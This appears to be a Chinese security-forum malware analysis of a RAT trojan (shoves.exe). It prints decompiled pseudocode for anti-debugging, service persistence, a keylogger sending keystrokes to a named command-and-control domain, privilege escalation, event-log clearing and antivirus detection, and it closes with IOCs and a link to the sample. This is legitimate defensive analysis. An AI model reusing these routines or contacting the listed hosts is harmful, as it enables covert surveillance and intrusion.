吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 8931|回复: 30
收起左侧

[PC样本分析] 一例RAT木马分析

  [复制链接]
XCarthGetlin 发表于 2020-7-24 17:28
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 XCarthGetlin 于 2020-7-24 18:02 编辑

说在前面:这个分析是前段时间的货,在微步上发过一次,现在看有些信息已经过时了(如名字,一些杀软的查杀结果,恶意IP存储内容,感兴趣的朋友可以上IP看看,有些新的东西被放进去了)这次分享到这来,算是个新人的分析帖吧。

样本分析

在处理日常的任务中发现可疑IP:172.247.132.146,简单查看是一个保存文件的站点,只保存了shoves.exe文件:
record1.PNG
该文件疑似远控木马,现做简要分析。

沙箱分析

程序运行后该程序会不断地向域名为vip79318901.f3322.net的主机发送请求:
ApataDNS:
record2.PNG

inetsim:
record3.PNG


存在修改注册表以自启动:
record4.PNG
修改读取镜像劫持相关的注册表:
record7.PNG
record6.PNG
不存在文件的写入操作,但存在大量的文件读操作用于导入函数:
record8.PNG
云沙箱分析结果:
https://s.threatbook.cn/report/file/10eeadc0c512fa8d52ee66f3d181f2ec9de65cba5c08559eea20b60d41867876/?sign=history&env=win7_sp1_enx64_office2013

PE文件分析

程序未加壳:
record9.PNG
恶意代码存在自定义的baidu段:
record11.PNG
内部使用了RC5/6算法进行加/解密:
record10.PNG
程序最开始使用GetStartupInfoA进行简单的反调试:
1
2
3
4
5
6
7
8
9
.text:00401F9A                 lea     eax, [ebp+StartupInfo]
.text:00401F9D                 push    eax             ; lpStartupInfo
.text:00401F9E                 call    ds:GetStartupInfoA
.text:00401FA4                 call    __wincmdln
.text:00401FA9                 mov     [ebp+lpCmdLine], eax
.text:00401FAC                 test    byte ptr [ebp+StartupInfo.dwFlags], 1
.text:00401FB0                 jz      short loc_401FB8
.text:00401FB2                 movzx   eax, [ebp+StartupInfo.wShowWindow]
.text:00401FB6                 jmp     short loc_401FBB
对程序部分指令解密,相关操作存放在恶意代码自定义的baidu段中:
1
2
3
4
baidu:00410213 52                                      push    edx
baidu:00410214 50                                      push    eax
baidu:00410215 68 BC 60 41 00                          push    offset byte_4160BC
baidu:0041021A E8 91 FD FF FF                          call    decrypt_40FFB0
解密是对0x4160BC开始的一段数据的操作,完成后内存从0x4160BC开始是一个DLL文件,该程序的主要攻击行为都在这个dll中:
record12.PNG
DLL文件仅有一个导出函数fuckyou:
record14.PNG


DllMain分析

DllMain主要是一些初始化的操作:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
GetInputState();
cur_thread_id = GetCurrentThreadId();
PostThreadMessageA(cur_thread_id, 0, 0, 0);
GetMessageA(&Msg, 0, 0, 0);                   //
                                               //
if ( dword_10011FBC )                         // 通过检测当前进程的父进程是不是explorer来进行反调试
{
   explorer_pid = get_explore_pid_100070B0();
   cur_pro_id = GetCurrentProcessId();
   if ( (explorer_pid == 0) == get_parent_process_pid_10007000(cur_pro_id) )
     ExitProcess(0);
}                                             //
                                               //
VersionInformation.dwOSVersionInfoSize = 148;
GetVersionExA(&VersionInformation);           //
                                               //
if ( &dword_10011FCC != -2 )
   create_thread_100080D0(0, 0, download_from_url_10006100, &dword_10011FCC + 2, 0, 0);// 开启一个线程下载文件
                                               //
if ( dword_10011FC8 )                         // kill run32dll.exe
   kill_run32dll_10005CB0();
if ( !byte_10011FB8 )                         // 注册服务相关
                                               //
{
   String = 0;
   memset(&v25, 0, 0x3FCu);
   v26 = 0;
   v27 = 0;
   Format = '%';
   v12 = 's';
   v13 = 0;
   sprintf(ServiceName_10011CD4, &Format, ServiceName_10011CD4);
   ServiceStartTable.lpServiceName = 'nnoC';
   ServiceStartTable.lpServiceProc = 'Gtce';
   v15 = 'puor';
   LOBYTE(v16) = 0;
   set_service_reg_10004D50(ServiceName_10011CD4, &ServiceStartTable, &String, 1024);// 注册服务:
                                               // Rspgcu zcltpgnd
                                               //
   if ( !lstrlenA(&String) )
   {
     reg_service_10003050(ServiceName_10011CD4, a1521);
     reg_set_10005D20(ServiceName_10011CD4);
   }
   v9 = init_COM_10006FB0();
   wsprintfA(&String2, aS, v9);
   if ( dword_10011FB4 )
   {
     memset(&Dst, 0, 0x104u);
     GetModuleFileNameA(0, &Dst, 0x104u);
     SHGetSpecialFolderPathA(0, &v18, 43, 0);
     lstrcatA(&v18, asc_1001172C);
     lstrcatA(&v18, &String2);
     lstrcatA(&v18, aExe);
     MoveFileA(&Dst, &v18);
   }
   else
   {
     memset(&Filename, 0, 0x104u);
     GetModuleFileNameA(0, &Filename, 0x104u);
   }
   Sleep(0x32u);
   v10 = create_thread_100080D0(0, 0, sub_100063D0, 0, 0, 0);
   WaitForSingleObject(v10, 0xFFFFFFFF);
   CloseHandle(v10);
   while ( 1 )
     Sleep(1000000u);
}
包括反调试,初始化服务,开启服务等操作。程序的主要攻击方法存放在attackfun_100063D0()中:

1.确保只有一个运行实例:
1
2
3
4
5
6
7
v0 = CreateMutexA(0, 0, &Name);               // 确保只有一个运行实例
if ( v0 && GetLastError() == ERROR_ALREADY_EXISTS )
{
    ReleaseMutex(v0);
    CloseHandle(v0);
    exit(0);
}
2.击键记录:
1
2
3
4
5
6
7
8
if ( dword_10011FC0 )
{
    sub_10003AB0(v23, v8);
    LOBYTE(v24) = 1;
    input_record_10003AE0();
    LOBYTE(v24) = 0;
    sub_10003A60(v23);
}
1
2
3
4
int input_record_10003AE0()
{
    return create_thread_100080D0(0, 0, key_logger_100026A0, 0, 0, 0);
}
3.使用GetKeyState, GetAsyncKeyState实现击键记录:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
v3 = GetKeyState(16);
v4 = *&byte_100113DC[v2 * 4];
v5 = v3;
if ( ((GetAsyncKeyState(*&byte_100113DC[v2 * 4]) >> 8) & 0x80u) == 0 )
{
v6 = *(&v8 + v4);
if ( v6 )
{
    *(&v8 + v4) = 0;
    if ( v4 == 8 )
    {
        lstrcatA(&String, String2);
        sub_10002450(&String);
    }
    else if ( lstrlenA(&String) <= 550 )
    {
        if ( v4 != 13 )
        {
            if ( v6 % 2 == 1 )
            {
                lstrcatA(&String, off_10011248[v2]);
            }
            else if ( !(v6 % 2) )
            {
                lstrcatA(&String, off_100110B4[v2]);
            }
            goto LABEL_35;
        }
    lstrcatA(&String, aEnter);
    sub_10002450(&String);
    }
    else
    {
        sub_10002450(&String);
    }
    memset(&String, 0, 0x258u);
}
}
else if ( GetKeyState(20) && v5 > -1 && v4 > '@' && v4 < ']' )
{
    *(&v8 + v4) = 1;
}
将击键记录的内容传输给url:vip79318901.f3322.net :
1
2
3
4
5
6
7
8
9
10
11
else
{
    v1 = *&asc_10011BA4;
    lstrcatA(&String1, aVip79318901F33);
}
if ( strcmp(&String1, byte_10013470) )
{
    v3 = GetTickCount();
    if ( connect_url_10001D00(v8, &String1, v1) )
        break;
}
4.sub_10003AB0(v23, v8)通过检索函数表来调用switch_case_10003D30:
1
2
*v2 = &off_1000C30C;
v2[1004] = 0
1
2
3
.rdata:1000C30C off_1000C30C    dd offset sub_10003A40  ; DATA XREF: sub_100039F0+11↑o
.rdata:1000C30C                                         ; sub_10003A60+C↑o ...
.rdata:1000C310                 dd offset switch_case_10003D30
switch_case_10003D30函数通过判断不同的情况操作:
     (1)提权:
1
2
case 0x70u:
    v5 = create_thread_100080D0(0, 0, privilege_10002CE0, *(this[1] + 72), 0, 0);
提权的关键函数通过OpenProcessToken得到进程的令牌句柄,使用LookupPrivilegeValue查询进程权限,最后用AdjustTokenPrivileges函数提升权限:
1
2
3
4
LookupPrivilegeValueA(0, Name, NewState.Privileges);
NewState.PrivilegeCount = 1;
NewState.Privileges[0].Attributes = 2;
AdjustTokenPrivileges(TokenHandle, 0, &NewState, 0, 0, 0);
     (2)删除日志:
1
2
case 4u:
    delete_event_log_10002E20(a2[1]);
删除日志函数通过OpenEventLog函数打开日志文件,如果成功打开,调用ClearEventLog函数清除日志文件,最后调用CloseEventLog函数关闭日志文件:
1
2
3
4
5
6
7
8
9
10
11
12
do
{
    v3 = OpenEventLogA(0, *v2);
    v4 = v3;
    if ( v3 )
    {
        ClearEventLogA(v3, 0);
        CloseEventLog(v4);
    }
    ++v2;
    result = v8-- - 1;
}
     (3)弹出MessageBox:
1
2
3
case 0xAu:
    v5 = create_thread_100080D0(0, 0, msgbox_10002DD0, (a2 + 1), 0, 0);
    goto LABEL_22;
5.查询进程镜像以反杀毒软件:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
memset(&v174, 0, 0x40u);
v1 = LoadLibraryA(aKernel32Dll_1);
creat_tool_help = GetProcAddress(v1, aCreatetoolhelp);
pro32_first = GetProcAddress(v1, aProcess32first);
pro32_next = GetProcAddress(v1, aProcess32next);
pro_list = (creat_tool_help)(2, 0);
if ( pro_list )
{
    v175 = 296;
    if ( !strstr(Str, SubStr) )
    {
        v4 = &Str;
        do
        {
            if ( (pro32_first)(pro_list, &v175) )
            {
                v5 = *v4;
                while ( lstrcmpiA(v5, &String2) )
            {
                if ( !(pro32_next)(pro_list, &v175) )
                    goto LABEL_10;
            }
            lstrcatA(lpString1, v4[1]);
            lstrcatA(lpString1, SubStr);
            }
            LABEL_10:
            v6 = v4[2];
            v4 += 2;
            v175 = 296;
        }
        while ( !strstr(v6, SubStr) );
    }
}
CloseHandle(pro_list);
result = lstrlenA(lpString1);
if ( !result )
    result = lstrcpyA(lpString1, asc_100121B8);
if ( v1 )
    result = FreeLibrary(v1);
return result;
查询的杀毒软件列表如下:
record15.PNG record16.PNG record17.PNG record18.PNG record19.PNG record20.PNG
导出函数fuckyou

导出函数fuckyou的功能与DllMain基本一致,主要也是调用attackfun_100063D0来进行恶意行为以及一些保持服务常驻的操作:

record21.PNG

其他一些可疑操作

程序还存在写入文件到%SystemDirectory%\1521.key的操作,配合击键记录函数进行击键记录:
1
2
3
4
5
GetSystemDirectoryA(&Buffer, 0x104u);
strcat(&Buffer, asc_1001172C);
strcat(&Buffer, a1521);
strcat(&Buffer, aKey);
v1 = CreateFileA(&Buffer, 0x40000000u, 2u, 0, 4u, 0x80u, 0);
但是在沙箱运行中并为发现文件的写入操作。

总结

该程序是RAT木马,具有提权,击键记录,删除日志,反杀毒软件等功能,可用于建立僵尸网络,发送垃圾邮箱来进行APT攻击。截至分析完毕(2020-07-18)该程序在一些主流的杀毒软件测试中均未报毒,具有很强的威胁性:
record22.PNG

相关IOC
list
value
MD5
ae318e417963fbaec1c0664b9162b63d
SHA-1
965b9b5be709e95950fd10ab1614edf3ab1ae70d
SHA-256
10eeadc0c512fa8d52ee66f3d181f2ec9de65cba5c08559eea20b60d41867876
Vhash
04505666151d15104012z180055mz6gz
Authentihash
058ca13631c7f65271190aaad5b67bc259d18c0b71d4fc368820b150facc655f
Imphash
926997c7dd52b150779d1291ece24039
SSDEEP
3072:3abe6nVEb7Mt+e74m3mOsr5PrQ+EGCZs+RbjySnKv:3yeH/e7hAr5DQ+yZvqSK
File type
Win32 EXE
Magic
PE32 executable for MS Windows (GUI) Intel 80386 32-bit
File size
428.00 KB (438272 bytes)
PEiD packer
Microsoft Visual C++

后话
由于个人能力有限,OD调试时候有几个异常过不去,有感兴趣的大佬可以自己调了玩一玩。
record13.png

shoves.rar

121.42 KB, 下载次数: 44, 下载积分: 吾爱币 -1 CB

密码:52pojie

免费评分

参与人数 6威望 +1 吾爱币 +24 热心值 +5 收起 理由
suphbj + 1 我很赞同!
ycuvuuui1L + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
就是那个秋 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
和平使者 + 1 谢谢@Thanks!
送葬者 + 1 + 1 我很赞同!
Hmily + 1 + 20 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

lumiaz7 发表于 2020-7-24 18:42
超牛逼 虽然我没看懂
 楼主| XCarthGetlin 发表于 2020-7-24 17:37
哎呀吾爱自带的编辑器不太会整,我自己修正修正
hgfty1 发表于 2020-7-24 18:56
月清晖 发表于 2020-7-24 19:37
hfs提权反杀啊!
az12az 发表于 2020-7-24 19:58
认真学习,不断提升。
Anxious 发表于 2020-7-24 20:03
在下新人,正在学习当中,感谢大佬的分析
天蝎梦 发表于 2020-7-24 20:09
借鉴一下
skyadmin 发表于 2020-7-24 20:57
好马 不过已经废了
cjcj5243 发表于 2020-7-24 21:16
楼主专业~~~
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则 警告:本版块禁止灌水或回复与主题无关内容,违者重罚!

快速回复 收藏帖子 返回列表 搜索

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-4-24 11:19

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表